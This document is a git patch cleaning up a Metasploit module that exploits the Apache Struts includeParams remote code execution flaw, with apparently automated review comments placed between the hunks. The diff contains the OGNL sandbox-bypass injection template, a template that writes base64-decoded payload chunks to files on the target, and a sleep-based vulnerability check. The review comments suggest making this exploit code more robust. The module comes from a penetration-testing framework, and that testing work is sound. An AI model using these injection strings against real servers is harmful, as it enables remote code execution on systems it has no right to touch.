From 146a30ec4d713164478ef9986779023abc14918e Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 31 May 2013 01:01:15 -0500 Subject: [PATCH] Do minor cleanup for struts_include_params --- .../multi/http/struts_include_params.rb | 44 +++++++++++-------- 1 file changed, 25 insertions(+), 19 deletions(-) diff --git a/modules/exploits/multi/http/struts_include_params.rb b/modules/exploits/multi/http/struts_include_params.rb index b43ab1a167..6d9a97bfe2 100644 --- a/modules/exploits/multi/http/struts_include_params.rb +++ b/modules/exploits/multi/http/struts_include_params.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GreatRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE 
@@ -18,17 +18,22 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Apache Struts includeParams Remote Code Execution', 'Description' => %q{ - This module exploits a remote command execution vulnerability in Apache Struts + This module exploits a remote command execution vulnerability in Apache Struts versions < 2.3.14.2. A specifically crafted request parameter can be used to inject arbitrary OGNL code into the stack bypassing Struts and OGNL library protections. + When targeting an action which requires interaction through GET the payload should + be split having into account the uri limits. In this case, if the rendered jsp has + more than one point of injection, it could result in payload corruption. It should + happen only when the payload is larger than the uri length. }, 'Author' => [ + # This vulnerability was also discovered by unknown members of: + # 'Coverity security Research Laboratory' + # 'NSFOCUS Security Team' 'Eric Kobrin', # Vulnerability Discovery 'Douglas Rodrigues', # Vulnerability Discovery - 'Coverity security Research Laboratory', # Vulnerability Discovery - 'NSFOCUS Security Team', # Vulnerability Discovery - 'Richard Hicks ', # Metasploit Module + 'Richard Hicks ' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => @@ -46,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote ['Windows Universal', { 'Arch' => ARCH_X86, - 'Platform' => 'windows' + 'Platform' => 'win' } ], ['Linux Universal', 
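Review bot: The sentence added to the Description, "the payload should be split having into account the uri limits", is ungrammatical and the caveat it carries (silent payload corruption) is the one an operator most needs to read correctly. Suggest `When targeting an action that only accepts GET, the payload is split to fit the URI length limit; if the rendered JSP has more than one injection point this can corrupt the payload. This only happens when the payload is larger than the URI limit.` Moving the Coverity and NSFOCUS credits into a `#` comment also drops them from the module's `info` metadata, so they no longer show in `info`/`search` output; if that is intended, a one-line comment saying why (unnamed individuals) would stop the next maintainer from "restoring" them. The `update_info` call this hunk edits starts and ends outside the hunk.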
@@ -65,18 +70,14 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'May 24 2013', 'DefaultTarget' => 2)) - register_options( - [ - Opt::RPORT(8080), - OptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]), - OptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', "/struts2-blank3/example/HelloWorld.action"]), - OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','GET', ['GET','POST']]), - OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) - ], self.class) - - #initialise some base vars - @inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}" - @java_upload_part_cmd = "#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()" + register_options( + [ + Opt::RPORT(8080), + OptString.new('PARAMETER',[ true, 'The parameter to use for the exploit (does not have to be an expected one).',rand_text_alpha_lower(4)]), + OptString.new('TARGETURI', [ true, 'The path to a vulnerable struts application action', "/struts2-blank/example/HelloWorld.action"]), + OptEnum.new('HTTPMETHOD', [ true, 'Which HTTP Method to use, GET or POST','POST', ['GET','POST']]), + OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) + ], self.class) end def execute_command(cmd, opts = {}) @@ -90,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote req_hash.merge!({ 'vars_get' => { datastore['PARAMETER'] => inject_string }}) end -# Display a nice "progress bar" instead of message spam + # Display a nice "progress bar" instead of message spam case @notify_flag when 0 print_status("Performing HTTP #{datastore['HTTPMETHOD']} requests to upload payload") 
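Review bot: Removing `@inject` and `@java_upload_part_cmd` from `initialize` means `execute_command` (whose body begins just after this hunk and is only partly visible) now depends on whichever public entry point ran first having populated them; any path that reaches `execute_command` without going through `exploit` will hit a nil `@inject` and fail with a NoMethodError on the template substitution rather than a clear error. Since both strings are constants, the robust form is a memoised accessor that every caller can use, e.g. `def inject_template; @inject ||= "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}"; end`, or plain frozen constants at class level. The default-value changes (`TARGETURI`, `HTTPMETHOD` to POST) look consistent with the new Description's warning about GET payload splitting. The enclosing `initialize` starts outside the hunk.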
@@ -105,6 +106,9 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit + #initialise some base vars + @inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}" + @java_upload_part_cmd = "#f=new java.io.FileOutputStream('FILENAME',APPEND),#f.write(new sun.misc.BASE64Decoder().decodeBuffer('BUFFER')), #f.close()" #Set up generic values. @payload_exe = rand_text_alphanumeric(4+rand(4)) pl_exe = generate_payload_exe @@ -172,6 +176,8 @@ class Metasploit3 < Msf::Exploit::Remote end def check + #initialise some base vars + @inject = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}" print_status("Performing Check...") sleep_time = datastore['CHECK_SLEEPTIME'] check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})"
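Review bot: The OGNL sandbox-bypass template `@inject` is now spelled out twice, here in `exploit` and again in `check` in the following hunk, so a future tweak to the `#_memberAccess` prefix in one place will silently not apply to the other. Hoist it (and `@java_upload_part_cmd`) to a frozen class-level constant and reference that from both methods, e.g. `INJECT = "${#_memberAccess[\"allowStaticMethodAccess\"]=true,CMD}".freeze`. A caveat worth a comment on the upload template: it relies on `sun.misc.BASE64Decoder`, a JDK-internal class that later JDK releases removed, so the upload step is expected to fail on targets running a modern JVM even when the `check` (which uses only `java.lang.Thread`) succeeds. The body of `exploit` continues past this hunk.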